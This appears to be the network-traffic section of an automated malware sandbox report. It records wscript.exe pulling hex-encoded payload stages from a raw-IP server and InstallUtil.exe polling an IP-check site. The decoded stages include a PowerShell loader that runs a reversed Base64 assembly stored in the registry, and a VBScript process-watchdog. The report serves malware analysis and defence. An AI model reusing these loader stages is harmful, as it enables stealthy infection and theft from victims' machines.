                          Aug 27, 2024 20:03:19.814389944 CEST1.1.1.1192.168.2.60xf9a2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • reallyfreegeoip.org
                          • 144.91.79.54
                          • checkip.dyndns.org

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649715144.91.79.54806504C:\Windows\SysWOW64\wscript.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:15.856900930 CEST176OUTGET /2508/s HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:16.529284954 CEST1236INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:16 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 16 Aug 2024 03:06:04 GMT
                          ETag: "7558-61fc43d62b74b"
                          Accept-Ranges: bytes
                          Content-Length: 30040
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Data Raw: 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                          Data Ascii: 3D41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                          Aug 27, 2024 20:03:16.529508114 CEST1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                          Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                          Aug 27, 2024 20:03:16.529520035 CEST448INData Raw: 35 37 38 35 37 36 32 33 34 34 32 37 39 36 33 36 43 36 34 35 37 35 41 37 33 36 43 36 44 36 34 37 30 34 41 34 38 35 35 36 42 35 36 34 37 36 34 37 41 35 36 35 37 36 34 37 38 35 36 36 44 36 33 33 38 34 31 34 33 34 39 36 37 34 31 34 33 34 39 36 37 36
                          Data Ascii: 5785762344279636C64575A736C6D64704A48556B5647647A56576478566D633841434967414349676F51442B6B4864704A58646A56326338414349674169434E346A4979596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E62733147656738
                          Aug 27, 2024 20:03:16.529531002 CEST1236INData Raw: 37 36 46 35 31 34 34 32 42 34 39 34 33 34 44 37 35 34 35 36 41 34 39 33 39 33 34 33 32 36 32 37 30 34 45 36 45 36 33 36 43 35 41 34 36 36 34 37 41 35 36 36 44 35 41 37 30 33 35 35 37 35 39 37 34 34 32 36 39 34 39 37 38 35 39 36 45 34 43 37 34 34
                          Data Ascii: 76F51442B49434D75456A4939343262704E6E636C5A46647A566D5A703557597442694978596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E6273314765676B48626931575A7A4E5859386F51444B3067502F4979636C6C6E4939556D627678
                          Aug 27, 2024 20:03:16.529544115 CEST1236INData Raw: 37 34 31 34 34 34 32 34 31 36 32 34 31 34 35 34 37 34 31 36 45 34 32 35 31 35 41 34 31 37 37 34 35 34 31 34 32 34 31 36 37 34 35 34 31 36 37 34 35 34 31 34 31 34 31 34 31 34 31 34 31 35 35 34 37 34 31 33 34 34 32 35 31 35 41 34 31 33 34 34 33 34
                          Data Ascii: 74144424162414547416E42515A41774541424167454167454141414141415547413442515A413443416E42775A415947416D42775A416347414141515A41304741684267544177474168426762414948416C424164413447414A4251414173414132414141414144417541414D413443417741674C41454441
                          Aug 27, 2024 20:03:16.529561996 CEST1236INData Raw: 31 34 39 34 31 32 46 34 31 34 31 34 31 35 39 35 31 34 33 34 31 34 31 34 34 37 37 34 39 34 31 34 31 34 31 34 31 34 31 34 31 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                          Data Ascii: 149412F41414159514341414477494141414141414541414141414141414141414141414141414141414941416747414141514141454141414141414141414141414141414141414141414141414941414141414145414141414141414141414141414141414141414149414167444141415141414541414141
                          Aug 27, 2024 20:03:16.529567957 CEST1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                          Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                          Aug 27, 2024 20:03:16.529580116 CEST896INData Raw: 43 34 41 35 36 35 41 36 41 34 41 35 38 36 34 37 36 34 45 35 38 35 41 35 33 33 35 37 39 36 33 36 43 34 45 36 44 36 33 33 31 33 39 33 32 36 33 36 43 34 41 36 43 34 43 37 34 35 36 34 37 36 34 37 41 36 43 33 33 35 35 37 33 34 32 34 31 34 31 34 31 34
                          Data Ascii: C4A565A6A4A5864764E585A533579636C4E6D63313932636C4A6C4C745647647A6C33557342414141454A41414151412B2B75794F44414141514C41414D335A756C476430563255756B58544C415141514141417A563259705A6E636C4E6C596C646C4C35316B4441457745414167636C4E5856756B58544841
                          Aug 27, 2024 20:03:16.529598951 CEST1236INData Raw: 33 34 35 34 34 34 33 37 39 35 36 34 37 35 41 37 33 36 43 35 37 36 34 34 33 35 36 33 32 35 39 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 36 42 35 36 34 37 36 33 33 35 35 32 35 36 36 35 37 33 36 34 36 44 36 32 37 36 34 41 34 38 36 34 35 34 33
                          Data Ascii: 34544437956475A736C576443563259795633627A566D556B5647633552566573646D62764A48645435796373393262553579636C4E6D63313932636C4A6C4C745647647A6C33557A415141424241417734434D75416A4C784544436C525859734258626C5256654E7041414267424141414141414541414267
                          Aug 27, 2024 20:03:16.530119896 CEST1236INData Raw: 38 34 32 34 34 35 31 36 39 34 35 34 32 36 37 36 39 34 35 35 36 35 39 37 37 34 32 36 38 34 41 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 34 31 34 33 35 33 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 38 37 37 36 37 34 35 34 32 36 37 36 39 34
                          Data Ascii: 842445169454267694556597742684A52416F495246476341435345414B53556842487767454267694556597742366F5131523833582F414C434A434F4E5A59465836644C434F495141675177414F45414145417745426F4142414D6841414D6842444177454267694556596741414D68414855414165456743
                          Aug 27, 2024 20:03:16.536309004 CEST1236INData Raw: 35 34 31 37 39 34 32 34 32 34 36 35 32 34 31 34 32 34 31 35 33 34 32 34 46 33 34 35 31 34 31 34 33 34 31 35 33 34 32 34 33 34 35 35 31 34 31 36 37 35 31 36 37 34 34 34 32 34 35 34 31 34 39 34 35 34 35 35 32 34 35 34 32 34 35 34 31 34 39 34 36 34
                          Data Ascii: 541794242465241424153424F34514143415342434551416751674442454149454552454245414946454141674D4143424541494541414D6D58416A356D32616F5730564574416538733448414141414141675A415547416B42775941494741684267524155454145427751414945414242514F416744413341
                          Aug 27, 2024 20:03:16.704832077 CEST176OUTGET /2508/r HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:16.912512064 CEST1236INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:16 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Sun, 25 Aug 2024 00:50:37 GMT
                          ETag: "8c00-62077658a4a62"
                          Accept-Ranges: bytes
                          Content-Length: 35840
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                          Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                          Aug 27, 2024 20:03:17.016016006 CEST199OUTGET /2508/ThXb4tU1jp1fQQFsQkY1.txt HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:17.233051062 CEST1236INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:17 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Mon, 26 Aug 2024 22:10:12 GMT
                          ETag: "22800-6209d638da8ee"
                          Accept-Ranges: bytes
                          Content-Length: 141312
                          Keep-Alive: timeout=5, max=98
                          Connection: Keep-Alive
                          Content-Type: text/plain
                          Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                          Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.649716158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:15.927800894 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:16.507905960 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:16 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 627cbed739efe013907c0fc63c07d34b
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:16.525433064 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:17.455646038 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:17 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 35811a314dbf562e2d0d6e1361f04827
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:18.652951002 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:19.989769936 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:19 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: e7468dbb7d551732572365905b66e068
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.649718144.91.79.54806504C:\Windows\SysWOW64\wscript.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:17.764951944 CEST176OUTGET /2508/v HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:18.409110069 CEST762INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:18 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 16 Aug 2024 03:14:55 GMT
                          ETag: "1de-61fc45d0b8951"
                          Accept-Ranges: bytes
                          Content-Length: 478
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                          Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D612E617B5D7D3A3A617B287D277C706174687C277B297D
                          Aug 27, 2024 20:03:18.512171030 CEST179OUTGET /2508/file HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:18.705929995 CEST1236INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:18 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Wed, 21 Aug 2024 05:14:58 GMT
                          ETag: "1030-6202a9f95545c"
                          Accept-Ranges: bytes
                          Content-Length: 4144
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 32 37 34 45 36 46 36 44 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 34 39 36 45 36 39 37 34 36 39 36 31 36 43 36 39 37 33 36 31 37 34 36 39 36 46 36 45 32 30 36 34 36 35 37 33 32 30 36 46 36 32 36 41 36 35 37 34 37 33 32 30 36 35 37 34 32 30 37 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 36 37 36 35 37 33 37 34 36 39 36 46 36 45 36 45 36 31 36 39 37 32 36 35 35 33 36 38 36 35 36 43 36 43 32 43 32 30 37 32 36 35 37 30 36 35 37 32 37 34 36 46 36 39 37 32 36 35 35 33 37 39 37 33 37 34 36 35 36 44 36 35 32 43 32 30 36 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 30 41 35 33 36 35 37 34 32 30 36 37 36 35 37 33 37 34 36 39 36 46 36 45 36 45 36 31 36 39 37 32 36 35 35 33 36 38 36 35 36 43 36 43 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 [TRUNCATED]
                          Data Ascii: 4F7074696F6E204578706C696369740A274E6F6D2064752070726F6A65743A207C706174687C0A2720496E697469616C69736174696F6E20646573206F626A657473206574207661726961626C65730A44696D2067657374696F6E6E616972655368656C6C2C207265706572746F69726553797374656D652C20697465726174696F6E0A5365742067657374696F6E6E616972655368656C6C203D204372656174654F626A6563742822575363726970742E5368656C6C22290A7265706572746F69726553797374656D65203D2067657374696F6E6E616972655368656C6C2E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A2720466F6E6374696F6E20706F75722076E9726966696572206C276578E9637574696F6E206427756E2070726F6365737375730A46756E6374696F6E2050726F6365737375734573744163746966286E6F6D447550726F636573737573290A2020202044696D2067657374696F6E6E61697265574D492C206C6973746544657350726F6365737375730A202020205365742067657374696F6E6E61697265574D49203D204765744F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696D763222290A20202020536574206C6973746
                          Aug 27, 2024 20:03:18.705961943 CEST1236INData Raw: 35 34 34 36 35 37 33 35 30 37 32 36 46 36 33 36 35 37 33 37 33 37 35 37 33 32 30 33 44 32 30 36 37 36 35 37 33 37 34 36 39 36 46 36 45 36 45 36 31 36 39 37 32 36 35 35 37 34 44 34 39 32 45 34 35 37 38 36 35 36 33 35 31 37 35 36 35 37 32 37 39 32
                          Data Ascii: 544657350726F636573737573203D2067657374696F6E6E61697265574D492E457865635175657279282253454C454354202A2046524F4D2057696E33325F50726F63657373205748455245204E616D653D27222026206E6F6D447550726F636573737573202620222722290A202020200A2020202050726F63
                          Aug 27, 2024 20:03:18.705975056 CEST1236INData Raw: 36 36 46 37 32 32 30 34 35 36 31 36 33 36 38 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 37 35 37 33 34 31 36 33 37 34 36 39 36 36 32 30 34 39 36 45 32 30 36 43 36 39 37 33 37 34 36 35 34 34 36 35 37 33 35 30 37 32 36 46 36 33 36 35 37 33 37
                          Data Ascii: 66F7220456163682070726F636573737573416374696620496E206C6973746544657350726F6365737375730A2020202020202020496620537472436F6D702870726F63657373757341637469662E4E616D652C2022706F7765727368656C6C2E657865222C20766254657874436F6D7061726529203D203020
                          Aug 27, 2024 20:03:18.706423044 CEST721INData Raw: 46 36 45 37 34 37 32 36 46 36 43 36 35 35 30 37 32 36 46 36 33 36 35 37 33 37 33 37 35 37 33 32 38 32 39 30 41 32 30 32 30 32 30 32 30 34 36 36 46 37 32 32 30 36 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 32 30 33 44 32 30 33 30 32 30 35
                          Data Ascii: F6E74726F6C6550726F63657373757328290A20202020466F7220697465726174696F6E203D203020546F2031303030302027204E6F6D6272652064276974E9726174696F6E732072E96475697420706F7572206C612064E96D6F6E7374726174696F6E2E0A20202020202020204966204E6F742050726F6365


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.649723158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:20.632390022 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:21.653367996 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:21 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 6918a0d78379da83e8fbc45759cde3c5
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.649727158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:22.305759907 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:23.513962984 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:23 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d693789a629cab29c6510d7da97f59e6
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.649729158.101.44.242805392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          Aug 27, 2024 20:03:24.330554962 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:25.625905037 CEST320INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:25 GMT
                          Content-Type: text/html
                          Content-Length: 103
